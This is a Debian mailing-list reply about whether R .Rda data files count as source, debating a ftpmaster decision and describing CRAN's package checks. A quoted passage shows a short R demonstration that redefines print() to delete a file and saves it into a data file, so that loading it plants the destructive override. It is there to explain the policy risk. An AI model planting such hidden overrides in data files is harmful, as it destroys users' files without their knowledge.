[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Decision on R datasets



Joerg Jaspert <joerg <at> debian.org> writes:
> it came to our attention[0] that most R packages ship data files (*.Rda,
> *.Rdata), which can contain a lot of different kind of data, from
> command line instructions, to huge data tables, or even extra modules
> loaded by means of install.packages() function.
> 
> It is common practice for R packages to fully document the content of
> the data files in .Rd files shipped in the source tarball[1], so it
> becomes easier to determine which kind of information those data files
> provide.

As this may not be common knowledge among Debian developers, I would also
like to point out that the CRAN network [the package mirrors for R, 
containing more than 4800 source packages, and having ~200 global mirrors] 
does extensive checks on incoming new packages which are very much inline 
with Debian's views.  PDF vignettes need to rebuildable from source, data 
sets much be documented etc pp.

CRAN does very extensive checks on incoming packages (and sometimes gets
some heat from the R Community over the proces; see recent r-devel email 
threads).

I think it is worthwhile to point this out. Debian is not the only 
organization taking this issue very seriously.

> Data files can contain modules loaded at runtime, for which we do not
> usually have corresponding source code shipped in the package (or even

I've been around R and a user/contributor/author for maybe 15 years, and 
I'd say that this is _extremely_ rare. Mostly these are in fact just data 
structures, possibly nested.  Saving your session in RData format for
redistribution is not common practice. RData / rda files almost always
contain data.

And they are generally documented, and often available from source. Eg the 
r-base-core package ['package' in the Debian sense] contains a package 
['package' in the R sense, something loaded by library()] called datasets
with multiple data files. For efficiency these are packaged together, but 
the source tarball has them as code, often as a structure.  [ You can 
always call dput() on an R object and it will print an ascii 
representation.]

On the other hand, some packages contain files in .rda (or .RData) format
in their sources. An example is eg tseries (aka r-cran-tseries) which 
switched to .rda when R started to mandated / recommend / prefer this more
compact representation. All .rda files do have corresponding help pages 
with source information but do not have 

> anywhere, if it was modified and saved without keeping the source file),
> or can contain malicious code as well. This is a very extreme corner
> case, but you cannot know it in advance.

Again, I think that is rare.
 
> This is an example of a R library without source code:
> 
> > install.packages("sig")

Not part of Debian though, ie one the 4600-ish package on CRAN but not in 
Debian (we have maybe 200 or so).

> [snip]
> > library("sig")
> > save(sig, file="mydata")
> >
> 
> When users load the data file, they have a sourceless library in their
> environment:
> 
> > before <- loadedNamespaces()
> > load("mydata")
> > setdiff(loadedNamespaces(), before)
> [1] "sig"
> >
> 
> This is an example of malicious code:
> 
> > old_print <- print
> > print <- function(...)
> + {
> + unlink('the_most_important_file.txt')
> + old_print('Say goodbye to your file!')
> + }
> > save.image("mydata")
> >
> 
> When users load the data file, and try to execute a simple print
> statement, they can have their files removed:
> 
> > load("mydata")
> > list.files()
> [1] "mydata"                      "the_most_important_file.txt"
> > print('Hello world!')
> [1] "Say goodbye to your file!"
> > list.files()
> [1] "mydata"
> 
> This just shows that there exist cases where .Rda files are *not* the
> prefered form of modification, such as placing code (or even whole
> libraries) into *.Rda files to be loaded.
> 
> Therefore, we shall consider these data files as preferred form of
> modification if the data was captured in this format from a scientific
> instrument, created manually and painstakingly by hand (this is not the
> common case), or otherwise not generated. If the data was generated, or
> converted by a script or series of scripts, the .Rda file is likely not
> the prefered form, and needs to be rebuilt at build-time from source (as
> we do with any binary in the archive).

I am very grateful that this discussion and decision did not lead to a 
'worst case' of outright rejection.  If you would like more information,
or to some (very Debian aware) folks at R Core (who are in your timezone) 
just shoot me an email off-list and I would be delighted to make an 
introduction.

Regards,  Dirk


Reply to: